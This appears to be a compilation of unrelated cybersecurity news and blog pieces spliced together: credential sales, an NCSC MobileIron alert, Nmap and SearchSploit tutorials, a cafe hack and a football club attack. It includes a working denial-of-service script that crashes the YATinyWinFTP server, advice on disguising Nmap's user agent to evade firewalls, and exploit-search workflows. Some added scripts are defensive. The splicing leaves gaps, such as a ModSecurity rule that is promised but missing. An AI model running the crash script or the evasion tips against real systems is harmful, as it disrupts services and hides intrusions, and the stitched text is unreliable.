An unknown hacker is selling Microsoft and Office 365 email account credentials of hundreds of C-level executives on an underground forum.
There’s no shortage of cybersecurity incidents, as is evident this year. Now, an anonymous hacker is reportedly selling Microsoft and Office 365 account data of hundreds of top executives in leadership roles from countries worldwide.
This data includes credentials (usernames and passwords) of executives such as the company president, vice president, chief operating officer (COO), chief financial officer (CFO), chief technology officer (CTO), chief marketing officer (CMO), and even the chief executive officer (CEO).
The data is being sold on an underground forum exploit.in, as discovered by ZDNet. Since exploit.in is off-limits to the general public, ZDNet confirmed the legitimacy of the account credentials with the help of an anonymous source from the cybersecurity community.
The source obtained credentials for two accounts: one belonging to the CEO of a medium-sized software company based in the U.S. and the other to the CFO of a European retail store chain. According to the source, hundreds of other user credentials have been put up for sale, each priced between $100 and $1,500 per account.
The seller refused to divulge how they got the data, but it is widely speculated that the AZORult trojan was used. AZORult harvests information from infected computers, producing what are called Azor logs. Cyber threat intelligence company KELA told ZDNet that the same malicious actor had previously shown interest in procuring these Azor logs.
The executives whose accounts have been compromised could also find themselves targets of business email compromise (BEC) attacks. In 2019, the FBI received 23,775 BEC attack complaints, which resulted in losses of more than $1.7 billion, about half of all cybercrime-related losses that year. Between April and May 2020, BEC attacks increased by 200%, making BEC one of the most preferred and successful cyber fraud methods.
BEC was also the #1 source of payment fraud attempts against U.S.-based organizations in 2019, with 75% of organizations targeted by such attacks. Beyond BEC, the credentials on sale also expose the account, and the sensitive company information inside it, to other malicious actors and competitors.
The British National Cyber Agency has put out an alert on the MobileIron remote code execution vulnerability.
According to the alert, APT nation state groups and cybercriminals are actively exploiting this vulnerability to compromise the networks of organisations within the United Kingdom.
Earlier this year, in June, MobileIron, a provider of mobile device management (MDM) systems, released security updates to address several vulnerabilities in their products. This included CVE-2020-15505, a remote code execution vulnerability rated critical. MDM systems allow system administrators to manage an organization’s mobile devices from a central server, making them a valuable target for threat actors.
The NCSC is aware that Advanced Persistent Threat (APT) nation-state groups and cybercriminals are now actively attempting to exploit this vulnerability [T1190] to compromise the networks of UK organizations.
The Cybersecurity and Infrastructure Security Agency (CISA) in the US has also noted that APTs are exploiting this vulnerability in combination with the Netlogon/Zerologon vulnerability CVE-2020-1472 in a single intrusion.
This critical vulnerability affects MobileIron Core and Connector products and could allow a remote attacker to execute arbitrary code on a system. The MobileIron website lists the following versions as affected:
Core and Connector: 10.3.0.3 and earlier; 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0
Sentry: 9.7.2 and earlier; 9.8.0
Monitor and Reporting Database (RDB): 2.0.0.1 and earlier
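The affected-version list above is easy to misread when a version is shorter or longer than the listed ones ("10.3" versus "10.3.0.3"). The following script, added here as an illustration and not code from NCSC or MobileIron, transcribes that list into inclusive upper bounds and exact matches and classifies an inventory of deployments against it. It assumes version strings are purely numeric dotted values, as in the list; the hostnames in the sample inventory are made up. A version absent from the list is reported as not listed, which is not the same as confirmed patched, so MobileIron's own guidance remains the authority.

```python
"""Check MobileIron product versions against the affected list reproduced above.

Added illustration; not NCSC or MobileIron code. The ranges are transcribed from
the alert's list and the product labels are the ones used there.
"""
from typing import Dict, List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'10.4.0.2' -> (10, 4, 0, 2); raises ValueError for anything non-numeric."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def version_le(a: Version, b: Version) -> bool:
    """a <= b after right-padding the shorter tuple with zeros ('10.3' == '10.3.0.0')."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) <= b + (0,) * (n - len(b))


# Affected versions for CVE-2020-15505 as listed above: "X and earlier" becomes an
# inclusive upper bound; everything else is an exact match.
CORE_AND_CONNECTOR = {
    "at_or_below": ["10.3.0.3"],
    "exact": ["10.4.0.0", "10.4.0.1", "10.4.0.2", "10.4.0.3",
              "10.5.1.0", "10.5.2.0", "10.6.0.0"],
}
AFFECTED: Dict[str, Dict[str, List[str]]] = {
    "core": CORE_AND_CONNECTOR,
    "connector": CORE_AND_CONNECTOR,
    "sentry": {"at_or_below": ["9.7.2"], "exact": ["9.8.0"]},
    "rdb": {"at_or_below": ["2.0.0.1"], "exact": []},
}


def is_affected(product: str, version: str) -> bool:
    """True if this product/version pair falls inside the affected list."""
    key = product.strip().lower()
    if key not in AFFECTED:
        raise ValueError(f"unknown product {product!r}; known: {sorted(AFFECTED)}")
    v = parse_version(version)
    rules = AFFECTED[key]
    if any(version_le(v, parse_version(bound)) for bound in rules["at_or_below"]):
        return True
    return any(v == parse_version(exact) for exact in rules["exact"])


def triage(inventory: List[Tuple[str, str, str]]) -> Tuple[List[str], List[str]]:
    """Split (hostname, product, version) records into listed-as-affected / not-listed."""
    affected, not_listed = [], []
    for host, product, version in inventory:
        (affected if is_affected(product, version) else not_listed).append(host)
    return affected, not_listed


if __name__ == "__main__":
    # Constructed inventory; hostnames and versions are made up for the example.
    sample = [("mdm-core-01", "core", "10.4.0.2"),
              ("mdm-core-02", "core", "10.6.0.1"),
              ("sentry-01", "sentry", "9.8.0"),
              ("rdb-01", "rdb", "2.0.0.1")]
    print(triage(sample))
```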
A proof-of-concept exploit became available in September 2020, and since then both hostile state actors and cyber criminals have attempted to exploit this vulnerability in the UK. These actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting (T1505.002). In some cases, when the latest updates are not installed, they have successfully compromised systems. The healthcare, local government, logistics and legal sectors have all been targeted, but others could also be affected.
Tom Davison, Technical Director – International at Lookout, a San Francisco, Calif.-based provider of mobile security solutions, notes, “The interesting story here is the assertion by cybersecurity agencies in the UK (NCSC) and the US (NSA) that nation state APT groups are actively exploiting these vulnerabilities, five full months after patches were issued. Mobile Device Management servers are by definition reachable from the public internet making them opportune targets. Offering a gateway to potentially compromise every mobile device in the organization, the attraction to attackers is clear. This highlights not just the importance of patching open vulnerabilities, but also the criticality of having a dedicated mobile security capability that is distinct from device management infrastructure.”
NCSC Conclusion
The NCSC strongly advises that organisations refer to the MobileIron guidance referenced in this alert and ensure the necessary updates are installed in affected versions. Organisations should also keep informed of any future updates to the guidance from MobileIron.
The NCSC generally recommends following vendor best practice advice in the mitigation of vulnerabilities. In the case of this MobileIron vulnerability, the most important aspect is to install the latest updates as soon as practicable.
Additionally, the NCSC advises organisations to follow the NCSC guidance in the mitigation section at the end of this alert. UK organisations should report any compromises to the NCSC via the website.
For more information, please refer to the NCSC alert that we have linked multiple times.
Final thoughts
WHY on earth are Organisations neglecting Updates/Patches to software etc?
Let’s put it into perspective. MobileIron released security updates in June 2020 for the above vulnerability plus other issues. The public PoC (proof of concept) surfaced in September 2020. We’re now just about into December, and yet organisations are allegedly still being exploited through this vulnerability.
The end goal will inevitably be ransomware or a data breach, and to be completely frank, organisations at this point have nobody else to blame but themselves.
Deploying patches and updates should be done regularly, weekly at the very least; quite clearly that’s not what is happening.
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10
------------------------------[Description]---------------------------------
This exploit connects to the FTP service and sends a command with a size of 256 bytes and a trailing space at the end.
The result: the service crashes.
-----------------------------[Exploit]---------------------------------------------
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import socket, sys
target = (sys.argv[1], int(sys.argv[2]))  # target host and FTP port from the command line
buffer = b'A' * 272 + b'\x20'             # oversized command followed by a trailing space
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))                       # read the FTP banner
s.send(buffer)                            # send the crashing command
s.close()
-----------------------------[how to run]-----------------------------
C:\> TinyWinFTP.exe servepath port
~$ python3 exploit.py targetip port
By default, Nmap comes bundled with NSE (the Nmap Scripting Engine), a fully integrated scripting engine with many useful libraries.
The http library is very commonly used; however, many people don’t realise they are using the user agent Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html).
This is obviously a value you wouldn’t want used when pen-testing, as it would give your presence away on the battlefield, as they say. Additionally, it is easily detected and blocked, as it is unique to Nmap’s NSE http library.
Furthermore, ModSecurity and many other WAFs (Web Application Firewalls) will quickly catch on to what you’re up to.
For example a ModSecurity rule that detects and blocks this default user agent is:
With a good security setup on the server, ModSecurity, fail2ban and similar tools would more than likely kick in, dropping your scanner’s connections.
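From the defender's side, the same property makes the default string a cheap detection. The script below is an added example, not part of the original post or of Nmap: it parses access-log lines in the Apache/nginx Combined Log Format, flags requests carrying the exact default user agent quoted above from http.lua, and separately counts all requests per source address. The log lines are constructed for the example (documentation addresses, made-up paths). The second counter is there because a client that overrides the user agent, as the post goes on to describe, vanishes from the first count but not from the request volume, so a user-agent match alone is a weak signal to rely on.

```python
"""Spot the default NSE user agent in web server access logs.

Added example; not from the original post or from Nmap. Log records are constructed.
"""
import re
from collections import Counter
from typing import Dict, Iterable, Optional

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The default value from nselib/http.lua, quoted in the text above.
NSE_DEFAULT_UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_nse_default_ua(user_agent: str) -> bool:
    """Exact-string check, mirroring what a WAF rule keyed on the user agent would do."""
    return user_agent == NSE_DEFAULT_UA


def nse_hits_by_ip(lines: Iterable[str]) -> Counter:
    """Count requests per source IP that carried the default NSE user agent."""
    hits: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and is_nse_default_ua(rec["ua"]):
            hits[rec["ip"]] += 1
    return hits


def requests_by_ip(lines: Iterable[str]) -> Counter:
    """Count every parseable request per source IP, whatever the user agent says."""
    totals: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec:
            totals[rec["ip"]] += 1
    return totals


# Constructed sample: two default-UA requests and one request with an overridden UA
# from the same scanner address, one ordinary browser request, and one junk line.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Dec/2020:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" '
    '"Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"',
    '203.0.113.5 - - [02/Dec/2020:10:00:01 +0000] "GET /sitemap.xml HTTP/1.1" 404 153 "-" '
    '"Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"',
    '203.0.113.5 - - [02/Dec/2020:10:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"',
    '198.51.100.7 - - [02/Dec/2020:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 2326 '
    '"https://example.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"',
    "this line is not an access log record",
]

if __name__ == "__main__":
    print("default NSE UA by source:", dict(nse_hits_by_ip(SAMPLE_LOG)))
    print("all requests by source:  ", dict(requests_by_ip(SAMPLE_LOG)))
```

Run against a real log with `nse_hits_by_ip(open("access.log"))`; both functions stream the file line by line and skip anything that does not match the format.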
According to the Nmap development team this value is left in by “design”, and if you want to change it you have to pass --script-args http.useragent="some ua" when launching your Nmap scans. The problem is that this is burdensome to add (and remember) every time you need it.
Nmap: how to change the user agent
You can find the default value in /usr/share/nmap/nselib/http.lua (at the beginning of the file, a couple of lines after the comments):
local USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
Here’s an example of a user agent that could be used as the default instead:
local USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
You can set it to whatever you like, stealth is key, change it periodically etc.
InfoSec veteran? Novice? Confused? It’s a huge acronym... “InfoSec”, CyberSec? Regardless, we should all know what Exploit-DB is: exploit-db is a website that provides a collection of vulnerabilities and exploit code from around the world, otherwise known as PoC (Proof of Concept) code.
SearchSploit Guide
Exploit-DB is not just a website, there is much more to it than that; Over time, exploit-db developers have created open source tools to facilitate users of all levels, so that the user can easily access the databases without even entering the exploit-db website.
What Is SearchSploit
One of those tools is SearchSploit, and today we will go over basic setup and usage. SearchSploit gives you the power to perform detailed offline searches through your locally checked-out copy of the repository. It is an open-source security tool that stores the exploit-db files locally, so we can easily access exploits in exploit-db without visiting the actual website, as explained earlier.
Installation Steps
1. On Unix systems, everything you need is in “coreutils” or “utilities” (e.g. bash, sed, grep, awk, etc.) plus “git”; these are installed by default on most Linux distributions and on OS X / macOS.
2. On Kali Linux, install the exploitdb package (if you are using the standard GNOME build of Kali Linux, the “exploitdb” package is already included by default!):
apt update && apt -y install exploitdb
If you are not using Kali Linux, the exploitdb package may not be available through your package manager, in which case you can install SearchSploit from its git repository instead.
3. Next, create a symbolic link in the “/usr/local/bin” directory that points to searchsploit, allowing you to run it without providing the full path.
4. After completion, it’s time to update SearchSploit:
searchsploit -u
5. Install additional modules required to run some functions of searchsploit:
apt install -y libxml2-utils
Searchsploit help output
Example search output:
New PoCs and new exploits are released all the time, so how do I...
How to update SearchSploit?
That’s fairly straightforward, too.
On Kali, update the package:
apt update && apt -y install exploitdb
or update the local copy directly:
searchsploit -u
Additional Example Usage
==========
Examples
==========
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
Basic Searching
Simply add any number of search terms you wish to look for:
kali@kali:~$ searchsploit afd windows local
--------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046) | windows/dos/18755.c
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit) | windows/local/21844.rb
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86-64/local/39525.py
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86/local/39446.py
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service | windows/dos/17133.c
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066) | windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080) | windows/local/18176.py
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Result
kali@kali:~$
Note, SearchSploit uses an AND operator, not an OR operator. The more terms that are used, the more the results will be filtered out.
Elite Tip: Do not use abbreviations (use SQL Injection, not SQLi).
Elite Tip: If you are not receiving the expected results, try searching more broadly by using more general terms (use Kernel 2.6 or Kernel 2.x, not Kernel 2.6.25).
Title Searching
By default, searchsploit will check BOTH the title of the exploit as well as the path. Depending on the search criteria, this may bring up false positives (especially when searching for terms that match platforms and version numbers). Searches can be restricted to the titles by using the -t option:
kali@kali:~$ searchsploit -t oracle windows
--------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------- ---------------------------------
Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation | windows_x86/local/3451.c
Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit) | windows_x86/remote/16731.rb
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit) | windows_x86/remote/16714.rb
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit) | windows_x86/remote/16809.rb
Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit) | windows/remote/35777.rb
Oracle MySQL (Windows) - MOF Execution (Metasploit) | windows/remote/23179.rb
Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit) | windows/remote/16957.rb
Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Do| multiple/dos/41932.cpp
Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Esc| windows_x86-64/local/41908.txt
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Result
kali@kali:~$
kali@kali:~$ searchsploit oracle windows | wc -l
100
kali@kali:~$
If we did not use -t, we would have 94 (6 lines are in the heading/footer) results, rather than 9.
Removing Unwanted Results
You can remove unwanted results by using the --exclude option. You can also remove multiple terms by separating the values with a | (pipe).
Elite Tip: By doing: searchsploit linux kernel --exclude="(PoC)|/dos/" | grep ' 3.2', you’ll get an even “cleaner” output (sorted based on the version without any heading/footers).
Examining Nmap result
Nmap has a feature that lets you save its results in .xml format, and searchsploit can then look up exploits for each service found in that Nmap XML file.
nmap -Pn -n IP -oX output.xml
With the above command we have saved Nmap’s scan results in an XML file, so that we can search for exploits related to the scanned ports/services.
searchsploit -x --nmap output.xml
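To make the search semantics above concrete (terms are ANDed, -t limits matching to the title, --exclude takes a regex with | between alternatives) and to show what the --nmap option has to work from, here is an added example that is not searchsploit's own code nor exploit-db data. INDEX is a made-up stand-in for the local exploit index (id, path, title); SAMPLE_NMAP_XML is a hand-written nmap -oX document for a documentation address. One point the example makes visible: the product and version attributes only exist in the XML when the scan ran with -sV, and without them the only term available is the generic service name.

```python
"""Mirror searchsploit's search semantics and its Nmap XML lookup on constructed data.

Added example; not searchsploit's own code. INDEX and SAMPLE_NMAP_XML are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

INDEX: List[Dict[str, str]] = [
    {"id": "1001", "path": "linux/remote/1001.py",   "title": "ExampleFTPd 2.3 - Remote Buffer Overflow"},
    {"id": "1002", "path": "linux/dos/1002.c",       "title": "ExampleFTPd 2.3 - Denial of Service (PoC)"},
    {"id": "1003", "path": "windows/remote/1003.rb", "title": "ExampleHTTPd 1.0 - Directory Traversal (Metasploit)"},
    {"id": "1004", "path": "linux/local/1004.txt",   "title": "ExampleKernel 3.2 - Privilege Escalation"},
]


def search(index: List[Dict[str, str]], terms: List[str],
           title_only: bool = False, exclude: Optional[str] = None) -> List[Dict[str, str]]:
    """AND every term (case-insensitive substring). title_only mirrors -t; exclude mirrors
    --exclude and is applied as a regex to the same text the terms were matched against."""
    excl = re.compile(exclude, re.IGNORECASE) if exclude else None
    matches = []
    for entry in index:
        haystack = entry["title"] if title_only else f'{entry["title"]} {entry["path"]}'
        if not all(t.lower() in haystack.lower() for t in terms):
            continue
        if excl and excl.search(haystack):
            continue
        matches.append(entry)
    return matches


def nmap_services(xml_text: str) -> List[Dict[str, object]]:
    """Open ports from an nmap -oX document. product/version are only present when the
    scan ran with -sV (service detection); a plain port scan yields service names only."""
    services = []
    for host in ET.fromstring(xml_text).iter("host"):
        for port in host.iter("port"):
            state = port.find("state")
            service = port.find("service")
            if state is None or state.get("state") != "open" or service is None:
                continue
            services.append({
                "port": int(port.get("portid", "0")),
                "name": service.get("name", ""),
                "product": service.get("product", ""),
                "version": service.get("version", ""),
            })
    return services


def query_terms(service: Dict[str, object]) -> List[str]:
    """Search terms for one service: product and version when known, else the service name."""
    terms = [str(t) for t in (service["product"], service["version"]) if t]
    return terms or [str(service["name"])]


def exploits_for_scan(xml_text: str, index: List[Dict[str, str]] = INDEX,
                      exclude: Optional[str] = None) -> Dict[int, List[str]]:
    """Map each open port to the ids of index entries matching its service terms."""
    return {int(str(svc["port"])): [e["id"] for e in search(index, query_terms(svc), exclude=exclude)]
            for svc in nmap_services(xml_text)}


SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -Pn -n -oX output.xml 192.0.2.10">
<host><status state="up" reason="user-set"/><address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
  <service name="ftp" product="ExampleFTPd" version="2.3" method="probed" conf="10"/></port>
<port protocol="tcp" portid="22"><state state="closed" reason="reset"/>
  <service name="ssh" method="table" conf="3"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
  <service name="http" method="table" conf="3"/></port>
</ports></host></nmaprun>"""

if __name__ == "__main__":
    print(exploits_for_scan(SAMPLE_NMAP_XML))
    print(exploits_for_scan(SAMPLE_NMAP_XML, exclude="(PoC)|/dos/"))
```

Port 80 in the sample has no product or version (as in a scan without -sV), so its only term is "http", which is exactly the kind of broad match the Elite Tips above warn will need narrowing or excluding.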
Examine an Exploit
Using the -x (--examine) option opens that exploit’s code in $PAGER so you can read what it does before using it.
17-year-old boy allegedly hacked payment system of a cafe and transferred funds from membership cards to his own card.
Mumbai: A teenaged student allegedly hacked into the payment system of a cafe and used it to transfer funds from the membership cards of other customers into his own. The 17-year-old student was asked to undergo counselling for two years by a juvenile court in Mumbai.
The accused teenager is pursuing chartered accountancy and he cleared his Class 12 exams with more than 80 per cent. The incident came to light when the owner of the coffee shop approached the cyber police on September 28 and lodged a complaint.
Customer approached owner with grievances
A probe revealed that the shop gives membership cards to its customers that can be used to make purchases and earn rewards. The owner grew suspicious when one of the customers told him that the funds from his card were spent even as he did not use it.
The owner of the cafe then checked the payment system and spoke to other customers. The other customers also had similar grievances. The man then approached the police and a probe was launched.
The police traced the IP address of the accused to Odisha but the same was a false lead, The Times of India reported. The police then used technical surveillance to locate the accused and traced him from a housing society. The police, however, did not know which of the 36 flats belonged to the accused.
The cops then camped at the building for four days and confirmed that the 17-year-old boy was involved. On Thursday, a charge sheet against the accused was filed before the juvenile court. Allegedly, the teenage boy had taken tips from YouTube to hack into the payment system of the cafe.
The club insists that no fan data was compromised during the attack, which left staff unable to use some online functions.
A spokesman for the club said: “The club is not aware of any fan data being accessed in the attack.”
Manchester United are being assisted by the UK’s cyber security agency after an online attack left the club unable to fully restore its systems.
The club said it had been hacked last week but that it was not “aware of any breach of personal data associated with our fans and customers”.
It reported the attack to the Information Commissioner’s Office, as required by law.
Staff at the Premier League club still do not have access to email, and the National Cyber Security Centre (NCSC) is now involved.
A spokesperson said: “The NCSC is aware of an incident affecting Manchester United Football Club and we are working with the organisation and partners to understand impact.”
The club would not say who was “responsible for the attack or the motives”.
“This attack was by nature disruptive, but we are not currently aware of any fan data being compromised,” it added.
“Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”
The club could face a fine from the Information Commissioner’s Office if it’s found that any fan data has been compromised.
On 13 November, Ticketmaster was handed a £1.25m fine after it was judged to have failed to keep customers’ data secure in a 2018 attack.
The NCSC said earlier this month that it had defended the UK from more than 700 cyber attacks in the last year, adding that it dealt with three times as many ransomware attacks compared with the year before.
It also said that criminals were adapting their approach during the attacks, threatening targets that they might leak data publicly, unless a ransom is paid.